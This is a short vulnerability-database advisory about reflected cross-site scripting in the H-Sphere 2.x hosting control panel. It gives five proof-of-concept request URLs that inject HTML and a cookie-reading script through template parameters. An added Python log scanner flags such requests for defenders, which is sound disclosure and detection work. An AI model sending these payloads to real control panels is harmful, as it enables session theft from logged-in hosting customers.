H-Sphere 2.x – HTML Template Inclusion Cross-Site Scripting

Vulnerability ID 1053947 Vulnerability type
Published 2003-06-09 Updated 2003-06-09
CVE ID N/A
CNNVD-ID N/A
Platform Java CVSS score N/A
|Source
https://www.exploit-db.com/exploits/22752
|Details
Vulnerability details have not yet been disclosed
|Exploit
source: http://www.securityfocus.com/bid/7855/info

H-Sphere is prone to multiple cross-site scripting vulnerabilities via the HTML template feature in the Hosting Control Panel. HTML and script code are not filtered from the pages generated when a request names an invalid or unknown template.

This could be exploited if a web user follows a malicious link, containing hostile HTML or script code, to a site hosting the vulnerable software. The link may also need to contain the username of a valid, logged-in user.

http://www.example.com/[PATH TO H-SPHERE]/servlet/psoft.hsphere.CP?action=login&ftemplate=[MORE CODE AND XSS]&requestURL="><h1>XSS%20in%20PSOFT%20SPHERE<a%20href="&login=[USERNAME]&password=[PASSWORD]

http://www.example.com/[PATH TO H-SPHERE]/servlet/psoft.hsphere.CP/[USERNAME]/[ID]/psoft.hsphere.CP?template_name=<H1>xss</H1>

http://www.example.com/[PATH TO H-SPHERE]/servlet/psoft.hsphere.CP/[USERNAME]/[ID]/psoft.hsphere.CP?template_name=<IFRAME>

http://www.example.com/[PATH TO H-SPHERE]/servlet/psoft.hsphere.CP/[USERNAME]/[ID]/psoft.hsphere.CP?template_name=<h1>XSS

http://www.example.com/[PATH TO H-SPHERE]/servlet/psoft.hsphere.CP/[USERNAME]/[ID]/psoft.hsphere.CP?template_name=<script>alert(document.cookie);</script>
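
Added example (not part of the original advisory or of H-Sphere): a log check a defender could run to find requests that carry HTML metacharacters in the three parameters used in the URLs above. The combined log format, the `/cp` path and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Servlet name and parameter names as they appear in the advisory's URLs.
SERVLET = "psoft.hsphere.CP"
WATCHED_PARAMS = {"template_name", "ftemplate", "requestURL"}
# Characters that let a reflected value leave HTML text or an attribute.
HTML_META = re.compile(r"[<>\"']")
# Assumption: combined-format access log with the request line in quotes.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample lines; "/cp" stands in for [PATH TO H-SPHERE].
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Jun/2003:10:00:00 +0000] "GET /cp/servlet/psoft.hsphere.CP?action=login&ftemplate=example/page.html HTTP/1.0" 200 5120',
    '192.0.2.11 - - [09/Jun/2003:10:00:05 +0000] "GET /cp/servlet/psoft.hsphere.CP/user/1/psoft.hsphere.CP?template_name=%3Ch1%3EXSS HTTP/1.0" 200 812',
    '192.0.2.12 - - [09/Jun/2003:10:00:09 +0000] "GET /cp/servlet/psoft.hsphere.CP?action=login&requestURL=%22%3E%3Ch1%3E HTTP/1.0" 200 830',
    '192.0.2.13 - - [09/Jun/2003:10:00:14 +0000] "GET /cp/servlet/psoft.hsphere.CP/user/1/psoft.hsphere.CP?template_name=%253Cb%253E HTTP/1.0" 200 799',
]


def suspicious_params(target):
    """Return sorted names of watched parameters carrying HTML metacharacters."""
    parts = urlsplit(target)
    if SERVLET not in parts.path:
        return []
    hits = set()
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl decodes once; unquote again to catch double encoding.
        if name in WATCHED_PARAMS and HTML_META.search(unquote(value)):
            hits.add(name)
    return sorted(hits)


def scan(lines):
    """Yield (line_number, parameter_names) for each flagged log line."""
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            names = suspicious_params(match.group(1))
            if names:
                yield number, names


if __name__ == "__main__":
    for number, names in scan(SAMPLE_LOG):
        print(f"line {number}: HTML metacharacters in {', '.join(names)}")
```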
